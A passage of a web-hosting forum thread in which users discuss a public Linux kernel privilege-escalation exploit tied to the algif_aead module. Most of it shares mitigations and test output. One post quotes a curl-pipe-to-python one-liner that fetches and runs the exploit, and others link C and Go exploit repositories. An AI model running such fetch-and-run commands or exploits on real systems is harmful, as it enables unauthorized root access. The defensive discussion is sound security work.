Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Register

Quick Links


Shells Virtual Desktop
BMail.ag - Secure Email Service
Server.net
CPLicense.net
VPS Server
Buy VPN
Vultr
VMs for AI
HostDare
HostDare
ReliableSite White-Label Dedicated Hosting for Resellers
InterServer VPS
BMail.ag - Secure Email Service
Best VPN
High-Performance Bare Metal Server Solutions
Karvl.com
Server Mania Cloud Hosting
DataWagon Hosting
AlphaVPS Hosting
Evoxt.com
Clouvider
VPS Hosting with NVMe
Residential IPs in the US & 4G Mobile Proxies in EU & US with Unlimited Bandwidth
ReliableSite White-Label Dedicated Hosting for Resellers
Rabisu - Hosting Solutions
Shells Virtual Desktop

Categories

In this Discussion

Home General
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Public exploit on most Linux distro’s - patching recommended

124»

Comments

  • rpqurpqu Member

    @BackboneDirect said:
    Rebootless method for patching via eBPF

    https://github.com/wgnet/wg.copyfail.patch

    sudo apt install -y clang libbpf-dev linux-bpf-dev git
git clone https://github.com/wgnet/wg.copyfail.patch
cd wg.copyfail.patch
sudo bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
sudo ./build.sh build
./apply.sh load
  • olokeoloke Member, Host Rep
    edited May 3

    @amarc said:
    From what I gathered if that kernel module is not loaded/available it's not exploitable ? Because on my couple servers Deb12 , Deb13, Ubuntu 24.04 systems these are not loaded and when I run curl https://copy.fail/exp | python3 && su nothing really happens and all I get is some:

    Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory

    Yes exactly, this output means it is not exploitable (since algif_aead module is not present).

  • emperoremperor Member
    edited May 3

    @amarc said: if that kernel module is not loaded/available it's not exploitable

    Yes this, and also python should be 3.10+ . It wont work on lower versions. In Rhel 8 family and Slackware python was +/- 3.9.25 thats why it was not working.

  • zedzed Member

    hey let me rawdog this exploit poc on my servers

  • eliphaseliphas Member
    edited May 3

    https://github.com/tgies/copy-fail-c
    no python needed, static binary that you can cross compile. uses some suid binary or change passwd to impersonate some other 4-digit user. scary.

  • tuctuc Member

    Me the only user on all my VPS servers.

  • wii747wii747 Member

    @tuc said:
    Me the only user on all my VPS servers.

    I am root on all my servers.

  • tuctuc Member

    @eliphas said:
    https://github.com/tgies/copy-fail-c
    no python needed, static binary that you can cross compile. uses some suid binary or change passwd to impersonate some other 4-digit user. scary.

    It does work, and it is available in go too (https://github.com/badsectorlabs/copyfail-go)

    If regular users have no access to c dev. environment, they can just go golang.

  • tuctuc Member

    My temporary "patch" is to follow the instructions at https://mondoo.com/vulnerability-intelligence/vulnerability/MONDOO-CVE-2026-31431, to disable algif_aead module.

    non-root user

    ./vulnerable
content of testfile fd=3 ---
init
---
[+] target:    testfile
[+] payload:   10 bytes (3 iterations)
[+] patch fd=3 off=0 bytes="vuln"
[+] patch ok
[+] patch fd=3 off=4 bytes="erab"
[+] patch ok
[+] patch fd=3 off=8 bytes="le"
[+] patch ok
[+] page cache mutated
content of testfile fd=3 ---
vulnerable
---
[!] VULNERABLE

    root user

    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

    non-root user

     ./vulnerable
content of testfile fd=3 ---
init
---
[+] target:    testfile
[+] payload:   10 bytes (3 iterations)
[+] patch fd=3 off=0 bytes="vuln"
bind(AF_ALG: authencesn(hmac(sha256),cbc(aes))): No such file or directory
[-] patch_chunk failed at offset 0
  • amarcamarc Veteran

    So it is scary but not that scary. It's not "every linux kernel since 2007" it's more like "every kernel with some module that is 50/50 not even there and 80% of people do not need it or even know what it is" situation.

    Thanked by 2tux borkedascii
  • gbzret4dgbzret4d Member

    Running yabs and turn off the vps prevents hacking

    Thanked by 1concept
  • rpqurpqu Member

    @gbzret4d said:
    Running yabs and turn off the vps prevents hacking

    Can't get hacked if OOM

    Thanked by 1gbzret4d
  • PacketraOliverPacketraOliver Member, Patron Provider
    edited May 5

    Even though it's based on a non-root user escalating the privilege, we were quick at closing this just in case, and apply kernel patches where applicable.

    Thanked by 1forest
  • spuyetspuyet Member, Patron Provider

    I've built a free packages scanner so you can check how bad your server is with vulnerabilities: https://fivenines.io/tools/linux-package-vulnerability-scanner

    Thanked by 8oloke buggedout JohnnySac khalequzzaman NetDynamics24 mandala ShadowLurker Porlam
  • forestforest Member

    @amarc said:
    So it is scary but not that scary. It's not "every linux kernel since 2007" it's more like "every kernel with some module that is 50/50 not even there and 80% of people do not need it or even know what it is" situation.

    Well, it's there on Debian, Ubuntu, RHEL, and RHEL clones by default.

  • rdesrdes Member

    Not in RHEL7 (and clones), and it's distribution from 2014.

  • forestforest Member

    One simple way to protect against this and similar vulnerabilities is just to disable module autoloading:

    echo "kernel.modprobe = " > /etc/sysctl.d/no-module-autoloading.conf
sysctl -p /etc/sysctl.d/no-module-autoloading.conf

    Unlike kernel.modules_disabled = 1, this can be reverted by root and doesn't block manual module loading or unloading. All it does is prevent unprivileged processes from triggering module loading by requesting some obscure functionality from the kernel like a rare socket family.

    Thanked by 5mandala zed ScreenReader NetDynamics24 JohnFilch123
  • vbloodsvbloods Member

    Updated ...

  • jorohe6515jorohe6515 Member

    Am I the only one who think Ubuntu sucks in security nowadays?
    Debian took a day to release a new kernel patching dirty frag, and still nothing from Ubuntu. Not in 24.04, nothing in 26.04. Waiting for a week now, that is not good.

  • emperoremperor Member

    New updates are available for debian.

    Thanked by 1default
  • forestforest Member

    @jorohe6515 said: Am I the only one who think Ubuntu sucks in security nowadays?

    It's usually the opposite. Ubuntu promptly releases fixes for even minor security issues while Debian only does emergency releases for major issues. Ubuntu also uses more compile-time hardening than Debian.

    Thanked by 1buggedout
  • OhJohnOhJohn Member
    edited May 17

    @jorohe6515 said: Am I the only one who think Ubuntu sucks in security nowadays?

    Nope, you are not.

    And this 404 is also not good: https://ubuntu.com/security/CVE-2026-46333 (Sunday, 22:20 UTC)

    Thanked by 1oloke
  • OhJohnOhJohn Member

    A three week security cycle on kernel builds just does not help if you get a potential zero day every friday...

Sign In or Register to comment.